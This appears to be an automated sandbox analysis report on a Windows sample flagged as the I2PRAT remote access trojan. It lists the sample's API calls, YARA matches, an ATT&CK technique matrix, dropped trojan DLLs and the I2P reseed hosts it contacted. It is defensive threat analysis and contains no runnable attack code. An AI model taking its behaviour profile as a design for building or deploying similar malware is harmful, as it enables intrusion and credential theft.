Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Code function: 20_2_00007FF6BFD67240 GetSystemTimeAsFileTime,

20_2_00007FF6BFD67240

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Code function: 20_2_00007FFE0E1638C3 LocalAlloc,wcsncpy,LookupAccountNameW,GetLastError,GetLastError,LocalAlloc,LookupAccountNameW,LocalFree,GetLastError,ConvertSidToStringSidA,GetLastError,wcslen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,

20_2_00007FFE0E1638C3

Source: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.29.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.29.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.29.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.29.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected I2PRAT

Source: Yara match	File source: 0000001F.00000002.2934870565.00000201EAE17000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2556948586.0000013B440BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: jvnu3e85o6ls9huft0apy3731vg.exe PID: 5840, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: main.exe PID: 4124, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: main.exe PID: 7008, type: MEMORYSTR
Source: Yara match	File source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_main.exe_59e5c191145a7e657df69e5cbadfff4911e783_61e28721_1d12cab9-8df1-4b73-ab59-8d57e46c430f\Report.wer, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER3E32.tmp.dmp, type: DROPPED
Source: Yara match	File source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\update.pkg, type: DROPPED

Remote Access Functionality

Yara detected I2PRAT

Source: Yara match	File source: 0000001F.00000002.2934870565.00000201EAE17000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2556948586.0000013B440BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: jvnu3e85o6ls9huft0apy3731vg.exe PID: 5840, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: main.exe PID: 4124, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: main.exe PID: 7008, type: MEMORYSTR
Source: Yara match	File source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_main.exe_59e5c191145a7e657df69e5cbadfff4911e783_61e28721_1d12cab9-8df1-4b73-ab59-8d57e46c430f\Report.wer, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER3E32.tmp.dmp, type: DROPPED
Source: Yara match	File source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\update.pkg, type: DROPPED

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 20_2_00007FFE0E16240A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,	20_2_00007FFE0E16240A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 20_2_00007FFE0EB44F8A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,	20_2_00007FFE0EB44F8A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 20_2_00007FFE0EBD240A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,	20_2_00007FFE0EBD240A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 20_2_00007FFE0EC0254A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,	20_2_00007FFE0EC0254A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 20_2_00007FFE11501ADA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,	20_2_00007FFE11501ADA
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 20_2_00007FFE133015FA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,	20_2_00007FFE133015FA
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 20_2_00007FFE1331B820 listen,htons,recv,select,	20_2_00007FFE1331B820
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 20_2_00007FFE1331B7E8 bind,	20_2_00007FFE1331B7E8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 20_2_00007FFE1330A7F1 bind,	20_2_00007FFE1330A7F1
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 31_2_00007FFE116B240A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,	31_2_00007FFE116B240A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 31_2_00007FFE116E4F8A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,	31_2_00007FFE116E4F8A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 31_2_00007FFE1171240A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,	31_2_00007FFE1171240A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 31_2_00007FFE1174254A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,	31_2_00007FFE1174254A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 31_2_00007FFE11771ADA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,	31_2_00007FFE11771ADA

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	2 Valid Accounts	1 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	21 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Native API	1 DLL Side-Loading	2 Valid Accounts	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	Data from Removable Media	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	1 Create Account	2 Access Token Manipulation	3 Obfuscated Files or Information	Security Account Manager	1 System Service Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	3 Service Execution	2 Valid Accounts	4 Windows Service	1 Software Packing	NTDS	3 File and Directory Discovery	Distributed Component Object Model	Input Capture	1 Multi-hop Proxy	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	4 Windows Service	11 Process Injection	1 Timestomp	LSA Secrets	24 System Information Discovery	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	1 Services File Permissions Weakness	1 Services File Permissions Weakness	1 DLL Side-Loading	Cached Domain Credentials	1 Network Share Discovery	VNC	GUI Input Capture	4 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 File Deletion	DCSync	131 Security Software Discovery	Windows Remote Management	Web Portal Capture	2 Proxy	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Masquerading	Proc Filesystem	1 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	2 Valid Accounts	/etc/passwd and /etc/shadow	31 Virtualization/Sandbox Evasion	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	2 Access Token Manipulation	Network Sniffing	1 Application Window Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	31 Virtualization/Sandbox Evasion	Input Capture	1 System Owner/User Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	11 Process Injection	Keylogging	1 System Network Configuration Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking
Determine Physical Locations	Virtual Private Server	Compromise Hardware Supply Chain	Unix Shell	Systemd Timers	Systemd Timers	1 Hidden Users	GUI Input Capture	Permission Groups Discovery	Replication Through Removable Media	Email Collection	Proxy	Exfiltration over USB	Network Denial of Service
Business Relationships	Server	Trusted Relationship	Visual Basic	Container Orchestration Job	Container Orchestration Job	1 Services File Permissions Weakness	Web Portal Capture	Local Groups	Component Object Model and Distributed COM	Local Email Collection	Internal Proxy	Commonly Used Port	Direct Network Flood

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
80P.exe	8%	Virustotal		Browse
80P.exe	5%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe	100%	Joe Sandbox ML
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll	26%	ReversingLabs	Win64.Trojan.Generic
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll	8%	ReversingLabs	Win64.Trojan.Generic
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll	32%	ReversingLabs	Win64.Trojan.Generic
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\libi2p.dll	3%	ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	70%	ReversingLabs	Win64.Trojan.Barys
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dll	8%	ReversingLabs	Win64.Trojan.Generic
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dll	3%	ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dll	0%	ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dll	3%	ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dll	50%	ReversingLabs	Win64.Trojan.Generic
C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe	70%	ReversingLabs	Win64.Trojan.Barys
C:\Windows\Temp\6DPA479I	3%	ReversingLabs
C:\Windows\Temp\9m9shiPj	8%	ReversingLabs	Win64.Trojan.Generic
C:\Windows\Temp\I2Hoxnam	50%	ReversingLabs	Win64.Trojan.Generic
C:\Windows\Temp\NCdDxWNe	3%	ReversingLabs
C:\Windows\Temp\TzijR9kt	3%	ReversingLabs
C:\Windows\Temp\ia0qD2w9	32%	ReversingLabs	Win64.Trojan.Generic
C:\Windows\Temp\ieIgHN2A	0%	ReversingLabs
C:\Windows\Temp\oWkqS6Ji	8%	ReversingLabs	Win64.Trojan.Generic
C:\Windows\Temp\wwgq2y6S	26%	ReversingLabs	Win64.Trojan.Generic

Source	Detection	Scanner	Label
https://i2p.novg.net/V	0%	Avira URL Cloud	safe
https://reseed-fr.i2pd.xyz/p_lib.c	0%	Avira URL Cloud	safe
http://127.0.0.1:8118(	0%	Avira URL Cloud	safe
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txtf	0%	Avira URL Cloud	safe
https://i2p.novg.net/	0%	Avira URL Cloud	safe
https://i2pseed.creativecowpat.net:8443/	0%	Avira URL Cloud	safe
https://reseed-fr.i2pd.xyz/	0%	Avira URL Cloud	safe
https://reseed.i2p-projekt.de/	0%	Avira URL Cloud	safe
http://reg.i2p/hosts.txtr	0%	Avira URL Cloud	safe
http://kopanyoc2lnsx5qwpslkik4uccej6zqna7qq2igbofhmb2qxwflwfqad.onion/i2pseeds.su3	0%	Avira URL Cloud	safe
https://netdb.i2p2.no/	100%	Avira URL Cloud	malware
https://www2.mk16.de/	0%	Avira URL Cloud	safe
https://i2p.ghativega.in/	0%	Avira URL Cloud	safe
https://reseed.memcpy.io/	0%	Avira URL Cloud	safe
https://reseed.i2pgit.org/	100%	Avira URL Cloud	malware
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt/	0%	Avira URL Cloud	safe
https://reseed2.i2p.net/hO	100%	Avira URL Cloud	malware
http://reg.i2p/hosts.txtl	0%	Avira URL Cloud	safe
https://reseed.i2pgit.org//p_lib.c	100%	Avira URL Cloud	malware
http://reg.i2p/hosts.txt	0%	Avira URL Cloud	safe
https://reseed.i2pgit.org/A	100%	Avira URL Cloud	malware
https://reseed-pl.i2pd.xyz/	0%	Avira URL Cloud	safe
http://127.0.0.1:8118	0%	Avira URL Cloud	safe
https://reseed-pl.i2pd.xyz/p_lib.c	0%	Avira URL Cloud	safe
https://reseed.diva.exchange/	100%	Avira URL Cloud	malware
http://identiguy.i2p/hosts.txt	0%	Avira URL Cloud	safe
http://stats.i2p/cgi-bin/newhosts.txt	0%	Avira URL Cloud	safe
https://legit-website.com/i2pseeds.su3	0%	Avira URL Cloud	safe
https://i2pd.readthedocs.io/en/latest/user-guide/configuration/	0%	Avira URL Cloud	safe
https://reseed.onion.im/	0%	Avira URL Cloud	safe
https://i2p.mooo.com/netDb/	0%	Avira URL Cloud	safe
https://reseed.stormycloud.org/k	0%	Avira URL Cloud	safe
http://rus.i2p/hosts.txt	0%	Avira URL Cloud	safe
https://reseed.stormycloud.org/	0%	Avira URL Cloud	safe
https://reseed2.i2p.net/	100%	Avira URL Cloud	malware
https://www2.mk16.de/(	0%	Avira URL Cloud	safe
https://banana.incognet.io/	0%	Avira URL Cloud	safe
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txttp://	0%	Avira URL Cloud	safe
http://127.0.0.1:8118J?	0%	Avira URL Cloud	safe
https://reseed.onion.im/B	0%	Avira URL Cloud	safe
https://i2p.ghativega.in/p/p_lib.c	0%	Avira URL Cloud	safe
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
reseed.i2pgit.org	68.183.196.133	true	true	unknown
reseed.diva.exchange	80.74.145.70	true	true	unknown
reseed.onion.im	159.223.194.171	true	true	unknown
reseed-pl.i2pd.xyz	185.226.181.238	true	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://reseed-fr.i2pd.xyz/	main.exe, main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, NCdDxWNe.20.dr	true	Avira URL Cloud: safe	unknown
https://i2p.novg.net/V	main.exe, 00000014.00000002.2557742278.0000013B45238000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://127.0.0.1:8118(	main.exe, 00000014.00000003.1898592051.0000013B45248000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000014.00000003.1898541929.0000013B45243000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://i2pseed.creativecowpat.net:8443/	main.exe, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, NCdDxWNe.20.dr	true	Avira URL Cloud: safe	unknown
https://reseed.i2p-projekt.de/	jvnu3e85o6ls9huft0apy3731vg.exe, 00000009.00000002.1956917307.00007FF65D45E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000014.00000002.2557134947.0000013B44DDB000.00000004.00000020.00020000.00000000.sdmp, r9vFmZ4q.20.dr, i2p.conf.20.dr	false	Avira URL Cloud: safe	unknown
http://kopanyoc2lnsx5qwpslkik4uccej6zqna7qq2igbofhmb2qxwflwfqad.onion/i2pseeds.su3	main.exe, 00000014.00000002.2557742278.0000013B45297000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://i2p.novg.net/	main.exe, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, NCdDxWNe.20.dr	true	Avira URL Cloud: safe	unknown
https://reseed-fr.i2pd.xyz/p_lib.c	main.exe, 00000014.00000003.1910940308.0000013B452A8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txtf	main.exe, 00000014.00000002.2557742278.0000013B4520D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://reg.i2p/hosts.txtr	main.exe, 00000014.00000002.2557742278.0000013B4520D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://netdb.i2p2.no/	jvnu3e85o6ls9huft0apy3731vg.exe, 00000009.00000002.1956917307.00007FF65D45E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000014.00000002.2557134947.0000013B44DDB000.00000004.00000020.00020000.00000000.sdmp, r9vFmZ4q.20.dr, i2p.conf.20.dr	false	Avira URL Cloud: malware	unknown
https://reseed.memcpy.io/	main.exe, main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, NCdDxWNe.20.dr	true	Avira URL Cloud: safe	unknown
https://i2p.ghativega.in/	main.exe, main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, NCdDxWNe.20.dr	true	Avira URL Cloud: safe	unknown
http://upx.sf.net	Amcache.hve.29.dr	false		high
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt/	main.exe, 00000014.00000002.2557742278.0000013B4520D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reseed.i2pgit.org/	main.exe, main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, NCdDxWNe.20.dr	true	Avira URL Cloud: malware	unknown
https://www2.mk16.de/	jvnu3e85o6ls9huft0apy3731vg.exe, 00000009.00000002.1956917307.00007FF65D45E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000014.00000002.2557742278.0000013B4520D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000014.00000002.2557742278.0000013B45238000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000014.00000002.2557134947.0000013B44DDB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000014.00000002.2559133821.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, NCdDxWNe.20.dr	true	Avira URL Cloud: safe	unknown
http://reg.i2p/hosts.txt	main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935350679.00000201EB8FF000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, r9vFmZ4q.20.dr, i2p.conf.20.dr, NCdDxWNe.20.dr	false	Avira URL Cloud: safe	unknown
http://reg.i2p/hosts.txtl	main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reseed.i2pgit.org//p_lib.c	main.exe, 00000014.00000003.1910940308.0000013B452A8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://reseed2.i2p.net/hO	main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://reseed.i2pgit.org/A	main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://reseed-pl.i2pd.xyz/	main.exe, main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, NCdDxWNe.20.dr	true	Avira URL Cloud: safe	unknown
http://stats.i2p/cgi-bin/newhosts.txt	jvnu3e85o6ls9huft0apy3731vg.exe, 00000009.00000002.1956917307.00007FF65D45E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000014.00000002.2557134947.0000013B44DDB000.00000004.00000020.00020000.00000000.sdmp, r9vFmZ4q.20.dr, i2p.conf.20.dr	false	Avira URL Cloud: safe	unknown
http://digitalbush.com/projects/masked-input-plugin/#license)	80P.exe	false		high
https://reseed-pl.i2pd.xyz/p_lib.c	main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://127.0.0.1:8118	jvnu3e85o6ls9huft0apy3731vg.exe, 00000009.00000002.1956917307.00007FF65D45E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000014.00000003.1898592051.0000013B45248000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000014.00000003.1898541929.0000013B45243000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000014.00000002.2557134947.0000013B44DDB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000003.2661057466.00000201EB4A8000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000003.2660987884.00000201EB4A3000.00000004.00000020.00020000.00000000.sdmp, r9vFmZ4q.20.dr, i2p.conf.20.dr	false	Avira URL Cloud: safe	unknown
